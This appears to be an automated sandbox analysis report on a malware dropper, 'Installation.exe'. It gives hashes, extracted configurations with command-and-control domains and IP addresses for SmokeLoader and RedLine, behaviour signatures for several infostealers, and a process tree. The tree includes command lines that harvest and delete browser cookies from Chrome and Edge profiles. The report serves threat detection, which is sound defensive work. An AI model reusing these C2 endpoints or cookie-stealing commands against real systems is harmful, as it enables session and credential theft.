Analysis
-
max time kernel
1803s -
max time network
1805s -
platform
windows11_x64 -
resource
win11 -
submitted
16-08-2021 10:04
General
-
Target
Installation.exe
-
Size
631KB
-
MD5
cbafd60beffb18c666ff85f1517a76f9
-
SHA1
9e015cba7168b610969bfc299a4ffe4763f4fd5f
-
SHA256
d31f2d2d991acee74d9be732c8180f37cea12aceaba324804fbcf2d0d2891a3d
-
SHA512
ba61ac5f49827b0fba2c72f4b19540b91f8bceb8b441a713b7de00317059955ad592c88af8f9c94093077503ab3b4c4c522b0e577599ca5020ad1b0f254066ce
Score
10/10
Malware Config
Extracted
Family
smokeloader
Version
2020
C2
http://readinglistforjuly1.xyz/
http://readinglistforjuly2.xyz/
http://readinglistforjuly3.xyz/
http://readinglistforjuly4.xyz/
http://readinglistforjuly5.xyz/
http://readinglistforjuly6.xyz/
http://readinglistforjuly7.xyz/
http://readinglistforjuly8.xyz/
http://readinglistforjuly9.xyz/
http://readinglistforjuly10.xyz/
http://readinglistforjuly1.site/
http://readinglistforjuly2.site/
http://readinglistforjuly3.site/
http://readinglistforjuly4.site/
http://readinglistforjuly5.site/
http://readinglistforjuly6.site/
http://readinglistforjuly7.site/
http://readinglistforjuly8.site/
http://readinglistforjuly9.site/
http://readinglistforjuly10.site/
rc4.i32
rc4.i32
Extracted
Family
redline
Botnet
installs3
C2
65.21.228.92:46802
Extracted
Family
redline
Botnet
1
C2
37.0.8.88:65442
Extracted
Family
redline
Botnet
ls3
C2
ganedokhot.xyz:80
Extracted
Family
metasploit
Version
windows/single_exec
Signatures
-
Glupteba
Glupteba is a modular loader written in Golang with various components.
-
Glupteba Payload 1 IoCs
-
MetaSploit
Detected malicious payload which is part of the Metasploit Framework, likely generated with msfvenom or similar.
-
Modifies Windows Defender Real-time Protection settings 3 TTPs
-
Process spawned unexpected child process 3 IoCs
This typically indicates the parent process was compromised via an exploit or macro.
-
Raccoon
Simple but powerful infostealer which was very active in 2019.
-
RedLine
RedLine Stealer is a malware family written in C#, first appearing in early 2020.
-
RedLine Payload 10 IoCs
-
SmokeLoader
Modular backdoor trojan in use since 2014.
-
Socelars
Socelars is an infostealer targeting browser cookies and credit card credentials.
-
Suspicious use of NtCreateProcessExOtherParentProcess 14 IoCs
-
Vidar
Vidar is an infostealer based on Arkei stealer.
-
evasion 7 IoCs
evasion.
-
suricata: ET MALWARE EXE Download Request To Wordpress Folder Likely Malicious
suricata: ET MALWARE EXE Download Request To Wordpress Folder Likely Malicious
-
suricata: ET MALWARE Observed Elysium Stealer Variant CnC Domain (all-brain-company .xyz in TLS SNI)
suricata: ET MALWARE Observed Elysium Stealer Variant CnC Domain (all-brain-company .xyz in TLS SNI)
-
suricata: ET MALWARE Possible Compromised Host AnubisNetworks Sinkhole Cookie Value Snkz
suricata: ET MALWARE Possible Compromised Host AnubisNetworks Sinkhole Cookie Value Snkz
-
suricata: ET MALWARE Terse alphanumeric executable downloader high likelihood of being hostile
suricata: ET MALWARE Terse alphanumeric executable downloader high likelihood of being hostile
-
suricata: ET MALWARE Win32/Adware.Agent.NSU CnC Activity
suricata: ET MALWARE Win32/Adware.Agent.NSU CnC Activity
-
suricata: ET MALWARE Win32/Adware.Agent.NSU CnC Activity M2
suricata: ET MALWARE Win32/Adware.Agent.NSU CnC Activity M2
-
Checks for common network interception software 1 TTPs
Looks in the registry for tools like Wireshark or Fiddler commonly used to analyze network activity.
-
Identifies VirtualBox via ACPI registry values (likely anti-VM) 2 TTPs
-
Nirsoft 1 IoCs
-
Vidar Stealer 1 IoCs
-
Blocklisted process makes network request 8 IoCs
-
Downloads MZ/PE file
-
Drops file in Drivers directory 2 IoCs
-
Executes dropped EXE 64 IoCs
-
VMProtect packed file 3 IoCs
Detects executables packed with VMProtect commercial packer.
-
Checks BIOS information in registry 2 TTPs 8 IoCs
BIOS information is often read in order to detect sandboxing environments.
-
Drops startup file 2 IoCs
-
Loads dropped DLL 64 IoCs
-
Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
-
Themida packer 6 IoCs
Detects Themida, an advanced Windows software protection system.
-
Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
-
Adds Run key to start application 2 TTPs 10 IoCs
-
Checks for any installed AV software in registry 1 TTPs 1 IoCs
-
Checks installed software on the system 1 TTPs
Looks up Uninstall key entries in the registry to enumerate software on the system.
-
Checks whether UAC is enabled 1 TTPs 6 IoCs
-
Enumerates connected drives 3 TTPs 64 IoCs
Attempts to read the root path of hard drives other than the default C: drive.
-
Legitimate hosting services abused for malware hosting/C2 1 TTPs
-
Looks up external IP address via web service 6 IoCs
Uses a legitimate IP lookup service to find the infected system's external IP.
-
Drops file in System32 directory 4 IoCs
-
Suspicious use of NtSetInformationThreadHideFromDebugger 4 IoCs
-
Suspicious use of SetThreadContext 8 IoCs
-
Drops file in Program Files directory 64 IoCs
-
Drops file in Windows directory 25 IoCs
-
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.
-
Program crash 13 IoCs
-
NSIS installer 2 IoCs
-
Checks SCSI registry key(s) 3 TTPs 3 IoCs
SCSI information is often read in order to detect sandboxing environments.
-
Checks processor information in registry 2 TTPs 64 IoCs
Processor information is often read in order to detect sandboxing environments.
-
Download via BitsAdmin 1 TTPs 1 IoCs
-
Enumerates system info in registry 2 TTPs 34 IoCs
-
Kills process with taskkill 2 IoCs
-
Modifies data under HKEY_USERS 43 IoCs
-
Modifies registry class 8 IoCs
-
Modifies system certificate store 2 TTPs 14 IoCs
-
Script User-Agent 2 IoCs
Uses user-agent string associated with script host/environment.
-
Suspicious behavior: EnumeratesProcesses 64 IoCs
-
Suspicious behavior: GetForegroundWindowSpam 1 IoCs
-
Suspicious behavior: MapViewOfSection 64 IoCs
-
Suspicious use of AdjustPrivilegeToken 64 IoCs
-
Suspicious use of FindShellTrayWindow 9 IoCs
-
Suspicious use of SetWindowsHookEx 1 IoCs
-
Suspicious use of WriteProcessMemory 64 IoCs
Processes
-
C:\Users\Admin\AppData\Local\Temp\Installation.exe"C:\Users\Admin\AppData\Local\Temp\Installation.exe"1⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of WriteProcessMemory
-
C:\Users\Admin\Documents\5Mp1TdghewUnofPglzyG2WAq.exe"C:\Users\Admin\Documents\5Mp1TdghewUnofPglzyG2WAq.exe"2⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
-
C:\Users\Admin\Documents\5Mp1TdghewUnofPglzyG2WAq.exeC:\Users\Admin\Documents\5Mp1TdghewUnofPglzyG2WAq.exe3⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
-
C:\Users\Admin\Documents\35SM90SrdCDhcnMYcnmUgvQl.exe"C:\Users\Admin\Documents\35SM90SrdCDhcnMYcnmUgvQl.exe"2⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
- Suspicious use of WriteProcessMemory
-
C:\Users\Admin\Documents\35SM90SrdCDhcnMYcnmUgvQl.exe"C:\Users\Admin\Documents\35SM90SrdCDhcnMYcnmUgvQl.exe"3⤵
- Executes dropped EXE
- Checks SCSI registry key(s)
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: MapViewOfSection
-
C:\Users\Admin\Documents\7zjNlw_VPADMMitd8gFCCZA1.exe"C:\Users\Admin\Documents\7zjNlw_VPADMMitd8gFCCZA1.exe"2⤵
- Executes dropped EXE
- Checks BIOS information in registry
- Checks whether UAC is enabled
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Suspicious use of AdjustPrivilegeToken
-
C:\Users\Admin\Documents\fvYN9hKmk9UGZV9RxKdwgODO.exe"C:\Users\Admin\Documents\fvYN9hKmk9UGZV9RxKdwgODO.exe"2⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
-
C:\Users\Admin\Documents\fvYN9hKmk9UGZV9RxKdwgODO.exeC:\Users\Admin\Documents\fvYN9hKmk9UGZV9RxKdwgODO.exe3⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
-
C:\Users\Admin\Documents\1z1s63Py6Cqed7KrMAeFLiN2.exe"C:\Users\Admin\Documents\1z1s63Py6Cqed7KrMAeFLiN2.exe"2⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
-
C:\Users\Admin\Documents\1z1s63Py6Cqed7KrMAeFLiN2.exe"C:\Users\Admin\Documents\1z1s63Py6Cqed7KrMAeFLiN2.exe"3⤵
- Executes dropped EXE
-
C:\Users\Admin\Documents\B_v7FbFMaCVtguWH_z__hkT1.exe"C:\Users\Admin\Documents\B_v7FbFMaCVtguWH_z__hkT1.exe"2⤵
- Executes dropped EXE
-
C:\Program Files (x86)\Company\NewProduct\customer3.exe"C:\Program Files (x86)\Company\NewProduct\customer3.exe"3⤵
- Executes dropped EXE
- Drops startup file
-
C:\Users\Admin\AppData\Local\Temp\11111.exeC:\Users\Admin\AppData\Local\Temp\11111.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt4⤵
- Executes dropped EXE
-
C:\Users\Admin\AppData\Local\Temp\11111.exeC:\Users\Admin\AppData\Local\Temp\11111.exe /DeleteCookiesWildcard "*.facebook.com"4⤵
- Executes dropped EXE
-
C:\Users\Admin\AppData\Local\Temp\11111.exeC:\Users\Admin\AppData\Local\Temp\11111.exe /CookiesFile "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Profile 2\Cookies" /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt4⤵
- Executes dropped EXE
-
C:\Users\Admin\AppData\Local\Temp\11111.exeC:\Users\Admin\AppData\Local\Temp\11111.exe /CookiesFile "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Profile 2\Cookies" /DeleteCookiesWildcard "*.facebook.com"4⤵
- Executes dropped EXE
-
C:\Users\Admin\AppData\Local\Temp\22222.exeC:\Users\Admin\AppData\Local\Temp\22222.exe /CookiesFile "C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Cookies" /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt4⤵
- Executes dropped EXE
-
C:\Users\Admin\AppData\Local\Temp\22222.exeC:\Users\Admin\AppData\Local\Temp\22222.exe /CookiesFile "C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Cookies" /DeleteCookiesWildcard "*.facebook.com"4⤵
- Executes dropped EXE
-
C:\Users\Admin\AppData\Local\Temp\22222.exeC:\Users\Admin\AppData\Local\Temp\22222.exe /CookiesFile "C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Profile 1\Cookies" /DeleteCookiesWildcard "*.facebook.com"4⤵
-
C:\Users\Admin\AppData\Local\Temp\22222.exeC:\Users\Admin\AppData\Local\Temp\22222.exe /CookiesFile "C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Profile 1\Cookies" /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt4⤵
-
C:\Program Files (x86)\Company\NewProduct\md8_8eus.exe"C:\Program Files (x86)\Company\NewProduct\md8_8eus.exe"3⤵
- Executes dropped EXE
- Checks whether UAC is enabled
- Suspicious use of AdjustPrivilegeToken
-
C:\Program Files (x86)\Company\NewProduct\jooyu.exe"C:\Program Files (x86)\Company\NewProduct\jooyu.exe"3⤵
- Executes dropped EXE
-
C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exeC:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt4⤵
-
C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exeC:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt4⤵
- Executes dropped EXE
-
C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exeC:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt4⤵
-
C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exeC:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt4⤵
-
C:\Users\Admin\Documents\EsxhG3_gIGbvwAFN8myBZi8b.exe"C:\Users\Admin\Documents\EsxhG3_gIGbvwAFN8myBZi8b.exe"2⤵
- Executes dropped EXE
-
C:\Users\Admin\Documents\c7KFBhJ4C17IfmS3rpbMCPnF.exe"C:\Users\Admin\Documents\c7KFBhJ4C17IfmS3rpbMCPnF.exe"2⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
-
C:\Users\Admin\Documents\giF6kyVuHkhMBN_DFw4d_fQJ.exe"C:\Users\Admin\Documents\giF6kyVuHkhMBN_DFw4d_fQJ.exe"2⤵
- Executes dropped EXE
-
C:\Users\Admin\Documents\giF6kyVuHkhMBN_DFw4d_fQJ.exe"C:\Users\Admin\Documents\giF6kyVuHkhMBN_DFw4d_fQJ.exe" -q3⤵
- Executes dropped EXE
-
C:\Users\Admin\Documents\QtaJGwHPddqgej6FX70BDYa9.exe"C:\Users\Admin\Documents\QtaJGwHPddqgej6FX70BDYa9.exe"2⤵
- Executes dropped EXE
- Checks BIOS information in registry
- Checks whether UAC is enabled
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Suspicious use of AdjustPrivilegeToken
-
C:\Users\Admin\Documents\5vMgVG9zA4l9mWyov7brGSyH.exe"C:\Users\Admin\Documents\5vMgVG9zA4l9mWyov7brGSyH.exe"2⤵
- Executes dropped EXE
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 1328 -s 3003⤵
- Program crash
- Checks processor information in registry
- Enumerates system info in registry
-
C:\Users\Admin\Documents\7JRNCYc9Q4d4F6qCkPC_NHYW.exe"C:\Users\Admin\Documents\7JRNCYc9Q4d4F6qCkPC_NHYW.exe"2⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
-
C:\Users\Admin\Documents\7JRNCYc9Q4d4F6qCkPC_NHYW.exeC:\Users\Admin\Documents\7JRNCYc9Q4d4F6qCkPC_NHYW.exe3⤵
- Executes dropped EXE
-
C:\Users\Admin\Documents\7JRNCYc9Q4d4F6qCkPC_NHYW.exeC:\Users\Admin\Documents\7JRNCYc9Q4d4F6qCkPC_NHYW.exe3⤵
- Executes dropped EXE
-
C:\Users\Admin\Documents\7JRNCYc9Q4d4F6qCkPC_NHYW.exeC:\Users\Admin\Documents\7JRNCYc9Q4d4F6qCkPC_NHYW.exe3⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
-
C:\Users\Admin\Documents\Z2gmdquIX3wKlYS1tpRskviY.exe"C:\Users\Admin\Documents\Z2gmdquIX3wKlYS1tpRskviY.exe"2⤵
- Executes dropped EXE
- Loads dropped DLL
- Suspicious use of AdjustPrivilegeToken
-
C:\Users\Admin\Documents\n6cHDpHKzQsbua1IL51TbmFA.exe"C:\Users\Admin\Documents\n6cHDpHKzQsbua1IL51TbmFA.exe"2⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
-
C:\Users\Admin\AppData\Roaming\1292224.exe"C:\Users\Admin\AppData\Roaming\1292224.exe"3⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\system32\WerFault.exeC:\Windows\system32\WerFault.exe -u -p 5392 -s 23124⤵
- Program crash
- Checks processor information in registry
- Enumerates system info in registry
-
C:\Users\Admin\AppData\Roaming\4415806.exe"C:\Users\Admin\AppData\Roaming\4415806.exe"3⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
-
C:\Users\Admin\Documents\RTqQYcYpcB8ukNlxo66LwG9g.exe"C:\Users\Admin\Documents\RTqQYcYpcB8ukNlxo66LwG9g.exe"2⤵
- Executes dropped EXE
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 1632 -s 2963⤵
- Drops file in Windows directory
- Program crash
- Suspicious use of AdjustPrivilegeToken
-
C:\Users\Admin\Documents\Jc4yVtEOotyL__khOXuqTI3o.exe"C:\Users\Admin\Documents\Jc4yVtEOotyL__khOXuqTI3o.exe"2⤵
- Executes dropped EXE
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 3192 -s 3203⤵
- Program crash
- Checks processor information in registry
- Enumerates system info in registry
-
C:\Users\Admin\Documents\KcI_K2fAIjh0nUxCOwxYf0dW.exe"C:\Users\Admin\Documents\KcI_K2fAIjh0nUxCOwxYf0dW.exe"2⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
-
C:\Users\Admin\Documents\KcI_K2fAIjh0nUxCOwxYf0dW.exe"C:\Users\Admin\Documents\KcI_K2fAIjh0nUxCOwxYf0dW.exe"3⤵
- Executes dropped EXE
- Loads dropped DLL
- Suspicious use of FindShellTrayWindow
-
C:\Users\Admin\Documents\Q1Ao_fBAsTY9AXieWLrh4ZmG.exe"C:\Users\Admin\Documents\Q1Ao_fBAsTY9AXieWLrh4ZmG.exe"2⤵
- Executes dropped EXE
-
C:\Users\Admin\Documents\rnMygaJY9bsTe76aVZpyXwUC.exe"C:\Users\Admin\Documents\rnMygaJY9bsTe76aVZpyXwUC.exe"2⤵
- Executes dropped EXE
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 2396 -s 2963⤵
- Program crash
-
C:\Users\Admin\Documents\f2Ahm4zYweQaGU_apxXy4wJA.exe"C:\Users\Admin\Documents\f2Ahm4zYweQaGU_apxXy4wJA.exe"2⤵
- Executes dropped EXE
-
C:\Users\Admin\Documents\McBIlPMIcehCj1VhnlSA1XBu.exe"C:\Users\Admin\Documents\McBIlPMIcehCj1VhnlSA1XBu.exe"2⤵
- Executes dropped EXE
-
C:\Users\Admin\AppData\Local\Temp\11111.exeC:\Users\Admin\AppData\Local\Temp\11111.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt3⤵
- Executes dropped EXE
-
C:\Users\Admin\AppData\Local\Temp\11111.exeC:\Users\Admin\AppData\Local\Temp\11111.exe /CookiesFile "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Profile 2\Cookies" /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt3⤵
- Executes dropped EXE
-
C:\Users\Admin\AppData\Local\Temp\11111.exeC:\Users\Admin\AppData\Local\Temp\11111.exe /CookiesFile "C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Cookies" /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt3⤵
- Executes dropped EXE
-
C:\Users\Admin\AppData\Local\Temp\11111.exeC:\Users\Admin\AppData\Local\Temp\11111.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt3⤵
-
C:\Users\Admin\AppData\Local\Temp\11111.exeC:\Users\Admin\AppData\Local\Temp\11111.exe /CookiesFile "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Profile 2\Cookies" /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt3⤵
-
C:\Users\Admin\AppData\Local\Temp\11111.exeC:\Users\Admin\AppData\Local\Temp\11111.exe /CookiesFile "C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Cookies" /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt3⤵
-
C:\Users\Admin\AppData\Local\Temp\11111.exeC:\Users\Admin\AppData\Local\Temp\11111.exe /CookiesFile "C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Profile 1\Cookies" /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt3⤵
-
C:\Users\Admin\AppData\Local\Temp\11111.exeC:\Users\Admin\AppData\Local\Temp\11111.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt3⤵
-
C:\Users\Admin\AppData\Local\Temp\11111.exeC:\Users\Admin\AppData\Local\Temp\11111.exe /CookiesFile "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Profile 2\Cookies" /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt3⤵
-
C:\Users\Admin\AppData\Local\Temp\11111.exeC:\Users\Admin\AppData\Local\Temp\11111.exe /CookiesFile "C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Cookies" /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt3⤵
-
C:\Users\Admin\AppData\Local\Temp\11111.exeC:\Users\Admin\AppData\Local\Temp\11111.exe /CookiesFile "C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Profile 1\Cookies" /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt3⤵
-
C:\Users\Admin\AppData\Local\Temp\11111.exeC:\Users\Admin\AppData\Local\Temp\11111.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt3⤵
-
C:\Users\Admin\AppData\Local\Temp\11111.exeC:\Users\Admin\AppData\Local\Temp\11111.exe /CookiesFile "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Profile 2\Cookies" /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt3⤵
-
C:\Users\Admin\AppData\Local\Temp\11111.exeC:\Users\Admin\AppData\Local\Temp\11111.exe /CookiesFile "C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Cookies" /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt3⤵
-
C:\Users\Admin\AppData\Local\Temp\11111.exeC:\Users\Admin\AppData\Local\Temp\11111.exe /CookiesFile "C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Profile 1\Cookies" /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt3⤵
-
C:\Users\Admin\AppData\Local\Temp\11111.exeC:\Users\Admin\AppData\Local\Temp\11111.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt3⤵
-
C:\Users\Admin\AppData\Local\Temp\11111.exeC:\Users\Admin\AppData\Local\Temp\11111.exe /CookiesFile "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Profile 2\Cookies" /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt3⤵
-
C:\Users\Admin\AppData\Local\Temp\11111.exeC:\Users\Admin\AppData\Local\Temp\11111.exe /CookiesFile "C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Cookies" /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt3⤵
-
C:\Users\Admin\AppData\Local\Temp\11111.exeC:\Users\Admin\AppData\Local\Temp\11111.exe /CookiesFile "C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Profile 1\Cookies" /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt3⤵
-
C:\Users\Admin\AppData\Local\Temp\11111.exeC:\Users\Admin\AppData\Local\Temp\11111.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt3⤵
-
C:\Users\Admin\AppData\Local\Temp\11111.exeC:\Users\Admin\AppData\Local\Temp\11111.exe /CookiesFile "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Profile 2\Cookies" /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt3⤵
-
C:\Users\Admin\AppData\Local\Temp\11111.exeC:\Users\Admin\AppData\Local\Temp\11111.exe /CookiesFile "C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Cookies" /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt3⤵
-
C:\Users\Admin\AppData\Local\Temp\11111.exeC:\Users\Admin\AppData\Local\Temp\11111.exe /CookiesFile "C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Profile 1\Cookies" /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt3⤵
-
C:\Users\Admin\Documents\rJDFkFv9mmHHWASOw8beydwV.exe"C:\Users\Admin\Documents\rJDFkFv9mmHHWASOw8beydwV.exe"2⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
-
C:\Users\Admin\Documents\rJDFkFv9mmHHWASOw8beydwV.exe"C:\Users\Admin\Documents\rJDFkFv9mmHHWASOw8beydwV.exe"3⤵
- Drops file in Drivers directory
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"4⤵
- Adds Run key to start application
- Enumerates system info in registry
- Suspicious use of FindShellTrayWindow
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.107 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.62 --initial-client-data=0x100,0x104,0x108,0xdc,0x10c,0x7ffb4d5646f8,0x7ffb4d564708,0x7ffb4d5647185⤵
- Checks processor information in registry
- Enumerates system info in registry
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2196,3585815263549903343,11994111954148778227,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=2232 /prefetch:25⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=2196,3585815263549903343,11994111954148778227,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2736 /prefetch:85⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=2196,3585815263549903343,11994111954148778227,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2284 /prefetch:35⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2196,3585815263549903343,11994111954148778227,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=7 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3156 /prefetch:15⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2196,3585815263549903343,11994111954148778227,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=6 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3176 /prefetch:15⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2196,3585815263549903343,11994111954148778227,131072 --lang=en-US --extension-process --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=4 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3624 /prefetch:15⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=2196,3585815263549903343,11994111954148778227,131072 --lang=en-US --service-sandbox-type=service --mojo-platform-channel-handle=4756 /prefetch:85⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2196,3585815263549903343,11994111954148778227,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=9 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4768 /prefetch:15⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2196,3585815263549903343,11994111954148778227,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=10 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4716 /prefetch:15⤵
-
